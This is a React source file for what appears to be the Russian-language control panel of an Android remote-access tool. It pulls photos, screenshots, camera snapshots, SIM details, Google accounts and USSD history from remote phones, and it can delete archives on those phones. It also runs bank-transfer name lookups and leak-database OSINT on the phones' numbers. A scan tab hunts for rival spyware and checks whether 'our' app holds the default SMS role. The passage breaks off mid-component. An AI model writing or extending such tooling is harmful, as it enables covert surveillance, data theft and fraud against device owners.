import React, { useState, useEffect, useMemo, useRef } from 'react';
import { renderStatus, renderInfoBlock, PERMISSIONS_GROUPS, PERMISSIONS_LABELS } from './constants';
import DeviceManagementTab from './DeviceManagementTab';
import api from '../../services/api';
import toastr from 'toastr';
import 'toastr/build/toastr.min.css';
import '../ConnectionStatus/ConnectionStatus.css';
import ServerArchivesTab from './ServerArchivesTab';

const TOAST = {
  use(overrides = {}) {
    toastr.options = {
      closeButton: false,
      progressBar: true,
      positionClass: 'toast-bottom-right',
      timeOut: 1500,
      extendedTimeOut: 800,
      preventDuplicates: true,
      newestOnTop: true,
      toastClass: 'toast toast-compact',
      titleClass: 'toast-title toast-title-compact',
      messageClass: 'toast-message toast-message-compact',
      ...overrides
    };
  },
  info(msg, overrides) {
    TOAST.use(overrides);
    toastr.info(msg);
  },
  success(msg, overrides) {
    TOAST.use(overrides);
    toastr.success(msg);
  },
  warning(msg, overrides) {
    TOAST.use(overrides);
    toastr.warning(msg);
  },
  error(msg, overrides) {
    TOAST.use(overrides);
    toastr.error(msg);
  }
};

const setCompactToast = () => {
  TOAST.use();
};

const LoadingDots = ({ text = 'Обновление', interval = 400 }) => {
  const [dots, setDots] = React.useState('');
  React.useEffect(() => {
    let i = 0;
    const t = setInterval(() => {
      i = (i + 1) % 4;
      setDots('.'.repeat(i));
    }, interval);
    return () => clearInterval(t);
  }, [interval]);
  return <span style={{ color: '#cfd2da' }}>{text}{dots}</span>;
};

const PotoView = ({ capturedPoto, onClearPoto, onSavePoto }) => {
  const [potoRotation, setPotoRotation] = useState(0);
  const handleRotate = () => {
    setPotoRotation(prev => (prev + 90) % 360);
  };
  useEffect(() => {
    setPotoRotation(0);
  }, [capturedPoto]);
  if (!capturedPoto) {
    return null;
  }
  return (
    <div className="poto-view-section" style={{ marginBottom: '20px', border: '1px solid #2ecc71', padding: '10px' }}>
      <h4 style={{ marginTop: 0, color: '#2ecc71' }}>Полученный снимок</h4>
      <div style={{ overflow: 'hidden', marginBottom: '10px' }}>
        <img
          src={capturedPoto.frame}
          alt="Captured Poto"
          style={{
            width: '100%',
            borderRadius: '4px',
            transition: 'transform 0.3s ease',
            transform: `rotate(${potoRotation}deg)`
          }}
        />
      </div>
      <div className="poto-controls" style={{ display: 'flex', gap: '10px' }}>
        <button onClick={handleRotate}>Перевернуть</button>
        <button onClick={() => onSavePoto(capturedPoto.potoId)}>Сохранить</button>
        <button onClick={onClearPoto} style={{ marginLeft: 'auto', background: '#e74c3c' }}>Закрыть</button>
      </div>
    </div>
  );
};

const ZipRequestModal = ({ onClose, onSubmit }) => {
  const [mode, setMode] = React.useState('all');

  const wrapperStyle = {
    position: 'fixed',
    inset: 0,
    backgroundColor: 'rgba(0,0,0,0.7)',
    zIndex: 3000,
    display: 'flex',
    alignItems: 'center',
    justifyContent: 'center',
    padding: '16px'
  };

  const modalStyle = {
    backgroundColor: '#2c303a',
    border: '1px solid #555',
    borderRadius: '12px',
    width: '100%',
    maxWidth: '420px',
    maxHeight: '90vh',
    overflow: 'auto',
    padding: '20px',
    color: '#fff',
    boxShadow: '0 10px 30px rgba(0,0,0,0.8)'
  };

  const groupStyle = {
    display: 'grid',
    gridTemplateColumns: '1fr',
    gap: '10px',
    marginTop: '10px'
  };

  const optionStyle = {
    display: 'flex',
    alignItems: 'flex-start',
    gap: '10px',
    padding: '12px',
    border: '1px solid #444',
    borderRadius: '10px',
    background: '#3a3f4c',
    cursor: 'pointer',
    lineHeight: 1.35,
    userSelect: 'none'
  };

  const radioStyle = {
    marginTop: '2px',
    minWidth: '18px',
    minHeight: '18px'
  };

  const footerStyle = {
    display: 'flex',
    justifyContent: 'flex-end',
    gap: '10px',
    marginTop: '20px'
  };

  return (
    <div style={wrapperStyle} onClick={onClose}>
      <div style={modalStyle} onClick={e => e.stopPropagation()} role="dialog" aria-modal="true">
        <h4 style={{ margin: 0, marginBottom: '12px', color: '#a5a4ff' }}>Скачать архивом</h4>
        <p style={{ margin: 0, fontSize: '13px', color: '#bbb' }}>Что упаковать в ZIP?</p>

        <div role="radiogroup" aria-label="Режим скачивания" style={groupStyle}>
          <label style={optionStyle}>
            <input
              type="radio"
              name="zip-mode"
              value="all"
              checked={mode === 'all'}
              onChange={() => setMode('all')}
              style={radioStyle}
            />
            <div>
              <div style={{ fontWeight: 600 }}>Все файлы</div>
              <div style={{ fontSize: 12, color: '#cfd2da' }}>Фото + скриншоты</div>
            </div>
          </label>

          <label style={optionStyle}>
            <input
              type="radio"
              name="zip-mode"
              value="images"
              checked={mode === 'images'}
              onChange={() => setMode('images')}
              style={radioStyle}
            />
            <div>
              <div style={{ fontWeight: 600 }}>Только фото</div>
              <div style={{ fontSize: 12, color: '#cfd2da' }}>Изображения без скриншотов</div>
            </div>
          </label>

          <label style={optionStyle}>
            <input
              type="radio"
              name="zip-mode"
              value="screenshots"
              checked={mode === 'screenshots'}
              onChange={() => setMode('screenshots')}
              style={radioStyle}
            />
            <div>
              <div style={{ fontWeight: 600 }}>Только скриншоты</div>
              <div style={{ fontSize: 12, color: '#cfd2da' }}>Скриншоты без фото</div>
            </div>
          </label>
        </div>

        <div style={footerStyle}>
          <button
            onClick={onClose}
            style={{ background: '#555', border: '1px solid #555', borderRadius: '8px', padding: '8px 12px', color: '#fff' }}
          >
            Отмена
          </button>
          <button
            onClick={() => onSubmit(mode)}
            style={{ background: '#22a06b', border: '1px solid #22a06b', borderRadius: '8px', padding: '8px 12px', color: '#fff', fontWeight: 'bold' }}
          >
            Отправить
          </button>
        </div>
      </div>
    </div>
  );
};

const MediaTabView = ({ mediaFiles, onGetMedia, onDownloadMedia, uploadProgress, capturedPoto, onClearPoto, onSavePoto }) => {
  const formatBytes = (bytes, decimals = 2) => {
    if (bytes === 0) return '0 Bytes';
    const k = 1024;
    const dm = decimals < 0 ? 0 : decimals;
    const sizes = ['Bytes', 'KB', 'MB', 'GB', 'TB'];
    const i = Math.floor(Math.log(bytes) / Math.log(k));
    return parseFloat((bytes / Math.pow(k, i)).toFixed(dm)) + ' ' + sizes[i];
  };

  const handleRequestMedia = (type) => {
    TOAST.info(type === 'images' ? 'Запрос списка фото отправлен на устройство.' : 'Запрос списка видео отправлен на устройство.');
    onGetMedia(type);
  };

  const renderFileList = (files, type) => (
    <div style={{ maxHeight: '300px', overflowY: 'auto', border: '1px solid #444', padding: '10px' }}>
      {files.length > 0 ? (
        <table style={{ width: '100%', borderCollapse: 'collapse' }}>
          <thead>
            <tr>
              <th style={{ textAlign: 'left' }}>Имя файла</th>
              <th style={{ textAlign: 'left' }}>Дата</th>
              <th style={{ textAlign: 'left' }}>Размер</th>
              <th style={{ textAlign: 'center' }}>Действие</th>
            </tr>
          </thead>
          <tbody>
            {files.map(file => {
              const progressInfo = uploadProgress?.[file.name];
              const isUploading = progressInfo && progressInfo.status !== 'end';
              return (
                <tr key={file.id || file.name}>
                  <td>{file.name}</td>
                  <td>{new Date(file.date).toLocaleString('ru-RU')}</td>
                  <td>{formatBytes(file.size)}</td>
                  <td style={{ textAlign: 'center', minWidth: '120px' }}>
                    {isUploading ? (
                      <div style={{ color: '#a5a4ff' }}>
                        Загрузка: {progressInfo.progress || 0}%
                      </div>
                    ) : (
                      <button onClick={() => onDownloadMedia(file.id, file.name, type)}>
                        Скачать
                      </button>
                    )}
                  </td>
                </tr>
              );
            })}
          </tbody>
        </table>
      ) : <p>Нет файлов для отображения. Нажмите "Запросить".</p>}
    </div>
  );

  return (
    <div className="info-section">
      <PotoView
        capturedPoto={capturedPoto}
        onClearPoto={onClearPoto}
        onSavePoto={onSavePoto}
      />

      <div
        className="media-controls"
        style={{
          marginBottom: '15px',
          display: 'flex',
          flexWrap: 'wrap',
          gap: '10px',
          alignItems: 'center',
          justifyContent: 'space-between'
        }}
      >
        <button
          onClick={() => handleRequestMedia('images')}
          style={{
            display: 'inline-block',
            width: 'auto',
            whiteSpace: 'nowrap',
            flex: '0 0 auto'
          }}
        >
          Запросить список Фото
        </button>
        <button
          onClick={() => handleRequestMedia('videos')}
          style={{
            display: 'inline-block',
            width: 'auto',
            whiteSpace: 'nowrap',
            flex: '0 0 auto'
          }}
        >
          Запросить список Видео
        </button>
      </div>

      <h5>Изображения ({(mediaFiles?.images || []).length})</h5>
      {renderFileList(mediaFiles?.images || [], 'images')}
      <h5 style={{ marginTop: '20px' }}>Видео ({(mediaFiles?.videos || []).length})</h5>
      {renderFileList(mediaFiles?.videos || [], 'videos')}
    </div>
  );
};

const ArchiveTabView = ({
  archivesList,
  zipBusy,
  zipProgressState,
  zipWarning,
  downloadLinks,
  isZipModalOpen,
  onOpenZipModal,
  onCloseZipModal,
  onSubmitZipRequest,
  onRequestList,
  onDownloadArchive,
  onDeleteArchive
}) => {
  const [lastListRequestedAt, setLastListRequestedAt] = React.useState(0);

  const formatBytes = (bytes) => {
    if (!bytes && bytes !== 0) return '—';
    const kb = 1024;
    const mb = kb * 1024;
    if (bytes >= mb) {
      const mbVal = bytes / mb;
      return `${mbVal.toFixed(0)} МБ`;
    }
    if (bytes >= kb) {
      const kbVal = bytes / kb;
      return `${kbVal.toFixed(0)} КБ`;
    }
    return `${bytes} B`;
  };

  const formatDateTime = (ms) => {
    if (!ms) return '—';
    return new Date(ms).toLocaleString('ru-RU');
  };

  const isMobile = typeof window !== 'undefined' && window.matchMedia('(max-width: 640px)').matches;

  const isPreparing =
    !!zipBusy &&
    (
      !zipProgressState ||
      typeof zipProgressState.total !== 'number' ||
      zipProgressState.total === 0 ||
      typeof zipProgressState.partsTotal !== 'number' ||
      zipProgressState.partsTotal <= 0
    );

  React.useEffect(() => {
    if (!lastListRequestedAt) return;
    if (Array.isArray(archivesList) && archivesList.length === 0 && !zipBusy) {
      TOAST.info('Список архивов на устройстве пуст.', { timeOut: 3000, extendedTimeOut: 1000 });
    }
  }, [archivesList, zipBusy, lastListRequestedAt]);

  const handleRequestList = () => {
    TOAST.info('Запрос списка архивов отправлен на устройство.');
    setLastListRequestedAt(Date.now());
    onRequestList();
  };

  const handleOpenZipModal = () => {
    onOpenZipModal();
  };

  const handleDownloadArchive = (arc) => {
    TOAST.info(`Запрос на скачивание: ${arc.fileName || 'архив.zip'}`);
    onDownloadArchive(arc);
  };

  const handleDeleteArchive = (arc) => {
    TOAST.info(`Запрос на удаление: ${arc.fileName || 'архив.zip'}`);
    onDeleteArchive(arc);
  };

  const completeToastLockRef = React.useRef(false);

  React.useEffect(() => {
    const done = zipProgressState?.progress === 100;
    const isLast =
      (zipProgressState?.partsTotal ?? 0) > 0 &&
      (zipProgressState?.partIndex ?? 0) >= (zipProgressState?.partsTotal ?? 0);

    if (!zipBusy || !zipProgressState || !done) {
      completeToastLockRef.current = false;
      return;
    }
    if (done && isLast && !completeToastLockRef.current) {
      completeToastLockRef.current = true;
      TOAST.success('Упаковка завершена. Обновляем список архивов.');
      setTimeout(() => {
        onRequestList();
      }, 500);
    }
  }, [zipBusy, zipProgressState, onRequestList]);

  const renderStatusLine = () => {
    if (!zipBusy && !zipWarning && !zipProgressState) return null;

    const lineStyleRow = {
      display: 'flex',
      flexWrap: 'wrap',
      alignItems: 'center',
      gap: '10px',
      marginBottom: '12px',
      color: '#a5a4ff',
      fontSize: '13px'
    };
    const lineStyleCol = {
      display: 'flex',
      flexDirection: 'column',
      gap: '4px',
      marginBottom: '12px',
      color: '#a5a4ff',
      fontSize: '13px'
    };
    const containerStyle = isMobile ? lineStyleCol : lineStyleRow;

    const partsChunk = (!isPreparing && zipProgressState?.partsTotal > 1)
      ? `архив ${zipProgressState.partIndex}/${zipProgressState.partsTotal}`
      : (isPreparing ? '' : 'архив 1/1');

    const progressChunk = (!isPreparing && zipProgressState)
      ? `Прогресс: ${zipProgressState.progress}% (${zipProgressState.processed}/${zipProgressState.total})`
      : '';

    const leftText = isPreparing ? 'Идёт подготовка на устройстве… (время подготовки зависит от мощности устройства)' : 'Идёт упаковка...';

    return (
      <div style={containerStyle}>
        <span>{leftText}</span>
        {!isPreparing && <span>{partsChunk}</span>}
        {!isPreparing && <span>{progressChunk}</span>}
        {zipWarning && <span style={{ color: '#ffcc00', fontWeight: 'bold' }}>{zipWarning}</span>}
      </div>
    );
  };

  return (
    <div className="info-section">
      <div
        style={{
          display: 'flex',
          flexWrap: 'wrap',
          gap: '10px',
          marginBottom: '6px',
          alignItems: 'center',
          justifyContent: 'space-between'
        }}
      >
        <button
          onClick={handleRequestList}
          style={{
            display: 'inline-block',
            width: 'auto',
            background: '#444',
            border: '1px solid #444',
            color: '#fff',
            whiteSpace: 'nowrap',
            flex: '0 0 auto'
          }}
        >
          Обновить список архивов
        </button>
        <button
          onClick={handleOpenZipModal}
          disabled={zipBusy}
          style={{
            display: 'inline-block',
            width: 'auto',
            background: '#5a5a9e',
            border: '1px solid #5a5a9e',
            color: '#fff',
            whiteSpace: 'nowrap',
            flex: '0 0 auto'
          }}
        >
          Скачать архивом
        </button>
      </div>

      {renderStatusLine()}

      {isZipModalOpen && (
        <ZipRequestModal
          onClose={onCloseZipModal}
          onSubmit={(mode) => {
            TOAST.success('Команда на упаковку отправлена на устройство.');
            onSubmitZipRequest(mode);
            onCloseZipModal();
          }}
        />
      )}

      {archivesList && archivesList.length > 0 ? (
        <div style={{ overflowX: 'auto' }}>
          <table style={{ width: '100%', borderCollapse: 'collapse', minWidth: '600px' }}>
            <thead>
              <tr style={{ textAlign: 'left', borderBottom: '1px solid #555' }}>
                <th style={{ padding: '8px' }}>Архив</th>
                <th style={{ padding: '8px' }}>Создан</th>
                <th style={{ padding: '8px' }}>Изображений</th>
                <th style={{ padding: '8px' }}>Размер</th>
                <th style={{ padding: '8px', textAlign: 'center' }}>Действия</th>
              </tr>
            </thead>
            <tbody>
              {archivesList.map((arc, idx) => {
                const dl = downloadLinks?.[arc.fileName];
                const canDownload = arc.status !== 'sent' && arc.filePath;
                return (
                  <tr key={arc.fileName || idx} style={{ borderTop: '1px solid #444' }}>
                    <td style={{ padding: '8px', fontWeight: 'bold', color: '#fff' }}>
                      {arc.fileName || `архив_${idx + 1}.zip`}
                    </td>
                    <td style={{ padding: '8px', color: '#ccc' }}>{formatDateTime(arc.createdAt)}</td>
                    <td style={{ padding: '8px', color: '#ccc' }}>{arc.count ?? '—'}</td>
                    <td style={{ padding: '8px', color: '#ccc' }}>{formatBytes(arc.fileSize)}</td>
                    <td style={{ padding: '8px', textAlign: 'center', minWidth: '180px' }}>
                      {(() => {
                        const haveReadyDownload = dl && dl.ready && dl.url;
                        if (haveReadyDownload) {
                          return (
                            <div style={{ display: 'flex', flexDirection: 'column', alignItems: 'center', gap: '6px' }}>
                              <a
                                href={dl.url}
                                onClick={() => TOAST.success('Скачивание ZIP началось', { timeOut: 1200, extendedTimeOut: 400 })}
                                style={{
                                  display: 'inline-block',
                                  background: '#22a06b',
                                  border: '1px solid #22a06b',
                                  color: '#fff',
                                  padding: '5px 8px',
                                  borderRadius: '4px',
                                  fontSize: '12px',
                                  textDecoration: 'none',
                                  fontWeight: 'bold'
                                }}
                                download={arc.fileName || 'archive.zip'}
                              >
                                Скачать ZIP
                              </a>
                              {arc.status === 'sent' && (
                                <div style={{ color: '#22a06b', fontWeight: 'bold', fontSize: '11px', lineHeight: '1.4', maxWidth: '140px' }}>
                                  архив удалён с устройства
                                </div>
                              )}
                            </div>
                          );
                        }
                        if (canDownload) {
                          const dlObj = downloadLinks?.[arc.fileName];
                          const progressText =
                            dlObj && dlObj.progress && !dlObj.ready
                              ? `Загрузка ${dlObj.progress}%`
                              : 'Скачать';

                          return (
                            <>
                              <button
                                onClick={() => handleDownloadArchive(arc)}
                                style={{ marginRight: '8px' }}
                              >
                                {progressText}
                              </button>
                              <button
                                onClick={() => handleDeleteArchive(arc)}
                                style={{ background: '#e74c3c', border: '1px solid #e74c3c', color: '#fff' }}
                              >
                                Удалить
                              </button>
                            </>
                          );
                        }
                        return (
                          <div style={{ color: '#22a06b', fontWeight: 'bold', fontSize: '13px', lineHeight: '1.4' }}>
                            архив был скачан и удалён с устройства
                          </div>
                        );
                      })()}
                    </td>
                  </tr>
                );
              })}
            </tbody>
          </table>
        </div>
      ) : (
        <p style={{ color: '#999' }}>Архивов нет.</p>
      )}
    </div>
  );
};

const renderPermissionStatus = (infoObject, permissionName) => {
  if (infoObject?.status === 'error' && infoObject?.message?.includes('Permission denied')) {
    return (
      <p>
        {permissionName} <span style={{ color: 'red', fontWeight: 'bold' }}>✖</span>
      </p>
    );
  }
  return null;
};

const ExtraInfoSection = ({ device, onCheckNumber, onCheckOsint, isLoading }) => {
  const [activeSubTab, setActiveSubTab] = useState('alfa');
  const [manualNumber, setManualNumber] = useState('');
  const [selectedSimIndex, setSelectedSimIndex] = useState(0);
  const simCards = device.systemInfo?.simInfo?.data?.active_sims || [];
  useEffect(() => {
    if (simCards.length > 0) {
      setSelectedSimIndex(simCards[0].simSlotIndex);
    }
    setManualNumber('');
  }, [device.uuid, activeSubTab, simCards]);
  const handleActionClick = () => {
    const selectedSim = simCards.find(sim => sim.simSlotIndex === selectedSimIndex);
    if (!selectedSim) return;
    const requiresManualInput = !selectedSim.number;
    const phoneNumber = requiresManualInput ? manualNumber : selectedSim.number;
    if (!phoneNumber) {
      TOAST.info('Номер телефона не указан.', { timeOut: 4000, extendedTimeOut: 1200 });
      return;
    }
    if (activeSubTab === 'alfa') {
      onCheckNumber(phoneNumber, selectedSimIndex);
    } else {
      onCheckOsint(phoneNumber, selectedSimIndex);
    }
  };
  const alreadyCheckedSimIndexes = (
    (activeSubTab === 'alfa'
      ? device.extraInfo
      : device.osintInfo
    ) || []
  )
    .map(info => info?.simSlotIndex)
    .filter(v => Number.isInteger(v));
  const selectedSim = simCards.find(sim => sim.simSlotIndex === selectedSimIndex);
  const subTabButtonStyle = { padding: '8px 16px', border: '1px solid #555', background: '#333', color: '#ccc', cursor: 'pointer', borderRadius: '4px' };
  const activeSubTabButtonStyle = { ...subTabButtonStyle, background: '#5a5a9e', color: '#fff', border: '1px solid #5a5a9e' };
  const renderActionBlock = (tabName) => (
    <div className="action-block" style={{ border: '1px solid #444', padding: '15px', borderRadius: '8px', marginBottom: '20px' }}>
      <h5 style={{ marginTop: 0 }}>Запросить информацию ({tabName})</h5>
      {simCards.length > 0 ? (
        <div>
          <p>Выберите SIM для проверки:</p>
          <div style={{ display: 'flex', gap: '15px', marginBottom: '15px', flexWrap: 'wrap' }}>
            {simCards.map(sim => (
              <label key={sim.simSlotIndex} style={{ cursor: 'pointer' }}>
                <input
                  type="radio"
                  name="sim-for-check"
                  value={sim.simSlotIndex}
                  checked={selectedSimIndex === sim.simSlotIndex}
                  onChange={() => setSelectedSimIndex(sim.simSlotIndex)}
                  disabled={alreadyCheckedSimIndexes.includes(sim.simSlotIndex)}
                />
                {`SIM ${sim.simSlotIndex + 1} (${sim.number || 'Номер не определен'})`}
                {alreadyCheckedSimIndexes.includes(sim.simSlotIndex) && ' (Уже проверено)'}
              </label>
            ))}
          </div>
          {selectedSim && !selectedSim.number && (
            <input
              type="text"
              placeholder="Введите номер телефона"
              value={manualNumber}
              onChange={(e) => setManualNumber(e.target.value)}
              style={{ width: '100%', padding: '8px', boxSizing: 'border-box', marginBottom: '10px' }}
              disabled={alreadyCheckedSimIndexes.includes(selectedSimIndex)}
            />
          )}
          <button onClick={handleActionClick} disabled={isLoading || alreadyCheckedSimIndexes.includes(selectedSimIndex)}>
            {isLoading ? 'Проверка...' : 'Проверить номер'}
          </button>
        </div>
      ) : <p>На устройстве нет активных SIM-карт.</p>}
    </div>
  );
  return (
    <div className="info-section">
      <h4>Дополнительная информация по номеру</h4>
      <div className="sub-tabs-container" style={{ marginBottom: '20px', display: 'flex', gap: '10px', borderBottom: '1px solid #444', paddingBottom: '10px' }}>
        <button onClick={() => setActiveSubTab('alfa')} style={activeSubTab === 'alfa' ? activeSubTabButtonStyle : subTabButtonStyle}>СПБ Альфы</button>
        <button onClick={() => setActiveSubTab('osint')} style={activeSubTab === 'osint' ? activeSubTabButtonStyle : subTabButtonStyle}>Осинт (аналог ГБ)</button>
      </div>
      {activeSubTab === 'alfa' && (
        <>
          {renderActionBlock('СПБ Альфы')}
          <div className="results-block">
            <h5 style={{ marginTop: 0 }}>Сохраненные результаты</h5>
            {device.extraInfo?.length > 0 ? device.extraInfo.map((info, index) => (
              <div key={index} style={{ border: '1px solid #555', padding: '10px', borderRadius: '5px', marginBottom: '10px' }}>
                <p style={{ marginBottom: '10px' }}>
                  <strong>Проверено:</strong> {info.phoneNumber} (с SIM {info.simSlotIndex + 1}) | <strong>Дата:</strong> {new Date(info.checkedAt).toLocaleString('ru-RU')}
                </p>
                <table style={{ width: '100%', borderCollapse: 'collapse', backgroundColor: '#2c2c2c' }}>
                  <thead>
                    <tr style={{ textAlign: 'left', borderBottom: '1px solid #555' }}>
                      <th style={{ padding: '8px' }}>номер</th>
                      <th style={{ padding: '8px' }}>фио</th>
                      <th style={{ padding: '8px' }}>банки</th>
                    </tr>
                  </thead>
                  <tbody>
                    {(info.responseData?.results || []).map((resultString, i) => {
                      const parts = resultString.split(';');
                      return (
                        <tr key={i} style={{ borderTop: '1px solid #444' }}>
                          <td style={{ padding: '8px' }}>{parts[0] || 'N/A'}</td>
                          <td style={{ padding: '8px' }}>{parts[1] || 'N/A'}</td>
                          <td style={{ padding: '8px' }}>{parts[2] || 'N/A'}</td>
                        </tr>
                      );
                    })}
                  </tbody>
                </table>
              </div>
            )) : <p>Сохраненных данных пока нет.</p>}
          </div>
        </>
      )}
      {activeSubTab === 'osint' && (
        <>
          {renderActionBlock('Осинт')}
          <div className="results-block">
            <h5 style={{ marginTop: 0 }}>Сохраненные результаты</h5>
            {device.osintInfo?.length > 0 ? device.osintInfo.map((info, index) => (
              <div key={index} style={{ border: '1px solid #555', padding: '10px', borderRadius: '5px', marginBottom: '10px' }}>
                <p style={{ marginBottom: '10px' }}>
                  <strong>Проверено:</strong> {info.phoneNumber} | <strong>Дата:</strong> {new Date(info.checkedAt).toLocaleString('ru-RU')}
                </p>
                {info.responseData.List && Object.entries(info.responseData.List).map(([dbName, dbData]) => (
                  <div key={dbName} style={{ borderTop: '1px dashed #444', marginTop: '10px', paddingTop: '10px' }}>
                    <h5 style={{ marginTop: 0, color: '#a5a4ff' }}>{dbName}</h5>
                    {dbData.InfoLeak && <p style={{ fontSize: '12px', color: '#999', margin: '-5px 0 10px 0' }}>{dbData.InfoLeak}</p>}
                    {(dbData.Data || []).map((record, recIndex) => (
                      <div key={recIndex} style={{ borderTop: recIndex > 0 ? '1px solid #333' : 'none', paddingTop: '5px', marginTop: '5px' }}>
                        {Object.entries(record).map(([key, value]) => (
                          <p key={key} style={{ margin: '2px 0' }}><strong>{key}:</strong> <span style={{ color: '#ddd' }}>{String(value)}</span></p>
                        ))}
                      </div>
                    ))}
                  </div>
                ))}
                {info.responseData['Error code'] && <p style={{ color: 'orange' }}>Ответ сервера: {info.responseData['Error code']}</p>}
              </div>
            )) : <p>Сохраненных данных пока нет.</p>}
          </div>
        </>
      )}
    </div>
  );
};

const renderGeneralSection = (info) => (
  <>
    {info && renderNetworkSection(info)}
    {info && renderHardwareSection(info)}
    {info && renderDeviceInfoSection(info)}
    {info && renderSimSection(info)}
    {info && renderGmailSection(info)}
    {info && renderPermissionsSection(info)}
  </>
);

const renderNetworkSection = (info) => (
  <div className="info-section">
    <h4>Сеть и подключение</h4>
    {renderStatus(info.publicNetworkInfo) || renderInfoBlock(info.publicNetworkInfo?.data)}
    {renderStatus(info.connectivityInfo) || renderInfoBlock(info.connectivityInfo?.data)}
  </div>
);

const renderHardwareSection = (info) => (
  <div className="info-section">
    <h4>Батарея и память</h4>
    {renderStatus(info.batteryInfo) || renderInfoBlock(info.batteryInfo?.data)}
    {renderStatus(info.memoryInfo) || renderInfoBlock(info.memoryInfo?.data)}
  </div>
);

const renderDeviceInfoSection = (info) => (
  <div className="info-section">
    <h4>Информация об устройстве</h4>
    {renderStatus(info.deviceInfo) || renderInfoBlock(info.deviceInfo?.data)}
    {renderStatus(info.securityInfo) || renderInfoBlock(info.securityInfo?.data)}
  </div>
);

const renderSimSection = (info) => (
  <div className="info-section">
    <h4>SIM Карты</h4>
    {renderStatus(info.simInfo) || (
      info.simInfo.data?.active_sims?.length > 0 ? info.simInfo.data.active_sims.map((sim, i) => (
        <div key={i} className="sim-details">
          <p><strong>Оператор:</strong> {sim.carrierName || 'N/A'}</p>
          <p><strong>Номер:</strong> {sim.number || 'Не определен'}</p>
          <p><strong>Слот:</strong> {sim.simSlotIndex}</p>
          <p><strong>ICCID:</strong> {sim.iccId || 'N/A'}</p>
        </div>
      )) : <p>Нет активных SIM-карт.</p>
    )}
  </div>
);

const renderUssdSection = (ussdHistory) => {
  return (
    <div className="info-section">
      <h4>История USSD-запросов</h4>
      <div className="ussd-history-list" style={{ maxHeight: '400px', overflowY: 'auto' }}>
        {ussdHistory && ussdHistory.length > 0 ? ussdHistory.map((item, index) => (
          <div key={item.id || index} style={{ border: '1px solid #444', borderRadius: '5px', padding: '10px', marginBottom: '10px' }}>
            <p style={{ margin: '0 0 5px 0', wordBreak: 'break-word' }}>
              <strong>Запрос:</strong> <span style={{ color: '#a5a4ff' }}>{item.request}</span>
            </p>
            <div style={{ background: '#2a2a2e', padding: '8px', borderRadius: '4px' }}>
              {item.status === 'success' ? (
                <pre style={{ margin: 0, whiteSpace: 'pre-wrap', color: '#ddd' }}>{item.response}</pre>
              ) : (
                <p style={{ margin: 0, color: '#e74c3c' }}>{item.response}</p>
              )}
            </div>
            <small style={{ color: '#888', display: 'block', textAlign: 'right', marginTop: '5px' }}>
              {typeof item.simIndex !== 'undefined' && `(SIM: ${item.simIndex + 1}) | `}
              {new Date(item.timestamp).toLocaleString('ru-RU')}
            </small>
          </div>
        )) : <p>Нет истории запросов.</p>}
      </div>
    </div>
  );
};

const renderGmailSection = (info) => (
  <div className="info-section">
    <h4>Google Аккаунты</h4>
    {
      renderPermissionStatus(info.accounts, 'Разрешение на Google аккаунты') ||
      renderStatus(info.accounts) ||
      (info.accounts.data?.emails?.length > 0 ? info.accounts.data.emails.map((email, i) => (
        <p key={i}>{email}</p>
      )) : <p>Нет аккаунтов.</p>)
    }
  </div>
);

const VERDICT_COLORS = {
  'Многофункциональный шпион':             '#e74c3c',
  'Кейлоггер / перехватчик SMS':           '#e74c3c',
  'Кейлоггер / шпионский модуль':          '#e74c3c',
  'Вымогатель / блокировщик':              '#e74c3c',
  'Перехватчик SMS (установлен по умолчанию)': '#e67e22',
  'Дроппер — устанавливает приложения':    '#e67e22',
  'Шпионское ПО — стилер данных':          '#e67e22',
  'Перехватчик / стилер SMS':              '#e67e22',
  'Перехватчик звонков':                   '#f39c12',
  'Перехватчик уведомлений':               '#f39c12',
  'Трекер геолокации':                     '#f39c12',
  'Маскируется под системное приложение':  '#f39c12',
  'Подозрительный доступ к спец. возможностям': '#bdc3c7',
  'Подозрительная активность':             '#bdc3c7',
  'Подозрительное приложение':             '#bdc3c7',
};

const MinkScanTab = ({ minkScanResult, onMinkScan }) => {
  const [expanded, setExpanded] = React.useState({});
  const toggleExpand = (pkg) => setExpanded(prev => ({ ...prev, [pkg]: !prev[pkg] }));

  const suspicious = minkScanResult?.suspicious || [];
  const summary = minkScanResult?.summary;
  const isScanning = minkScanResult?.scanning === true;

  return (
    <div className="info-section">
      <div style={{ display: 'flex', justifyContent: 'space-between', alignItems: 'center', marginBottom: 16 }}>
        <div>
          <h4 style={{ margin: 0 }}>🔍 Проверка на наличие РАТ / шпионского ПО</h4>
          <p style={{ color: '#888', fontSize: '12px', margin: '4px 0 0 0' }}>
            Эвристический анализ: проверяет активные хуки (доступность, SMS, уведомления, администратор) и подозрительные разрешения.
          </p>
        </div>
        <button
          onClick={() => onMinkScan && onMinkScan()}
          disabled={isScanning}
          style={{ padding: '8px 18px', background: isScanning ? '#3a3f4c' : '#5865f2', color: isScanning ? '#666' : '#fff', border: 'none', borderRadius: '6px', cursor: isScanning ? 'not-allowed' : 'pointer', fontWeight: 'bold', fontSize: '13px', whiteSpace: 'nowrap' }}
        >
          {isScanning ? '⏳ Сканирование...' : '▶ Запустить сканирование'}
        </button>
      </div>

      {summary && (
        <div style={{ background: '#1e2230', border: '1px solid #444', borderRadius: '8px', padding: '12px 16px', marginBottom: 16, display: 'flex', gap: 24, flexWrap: 'wrap', fontSize: '13px' }}>
          <span>Проверено приложений: <b style={{ color: '#fff' }}>{summary.scanned}</b></span>
          <span>Подозрительных: <b style={{ color: suspicious.length > 0 ? '#e74c3c' : '#2ecc71' }}>{summary.suspicious_count}</b></span>
          <span>SMS по умолч.: <b style={{ color: summary.is_our_default_sms ? '#2ecc71' : '#e67e22' }}>{summary.default_sms_package || '—'}</b></span>
          <span style={{ color: '#666', fontSize: '11px', alignSelf: 'center' }}>{summary.note}</span>
        </div>
      )}

      {!minkScanResult && !isScanning && (
        <p style={{ color: '#888', textAlign: 'center', marginTop: 40 }}>Нажмите «Запустить сканирование» для анализа устройства.</p>
      )}

      {suspicious.length === 0 && summary && (
        <div style={{ textAlign: 'center', padding: '30px 0', color: '#2ecc71', fontSize: '15px' }}>
          ✅ Подозрительных приложений не обнаружено
        </div>
      )}

      {suspicious.length > 0 && (
        <div style={{ display: 'flex', flexDirection: 'column', gap: 10 }}>
          {suspicious.map((item, i) => {
            const color = VERDICT_COLORS[item.verdict] || '#bdc3c7';
            const isOpen = expanded[item.pkg];
            return (
              <div key={i} style={{ border: `1px solid ${color}55`, borderRadius: 8, background: '#1e2230', overflow: 'hidden' }}>
                <div
                  onClick={() => toggleExpand(item.pkg)}
                  style={{ display: 'flex', justifyContent: 'space-between', alignItems: 'center', padding: '10px 14px', cursor: 'pointer', gap: 10 }}
                >
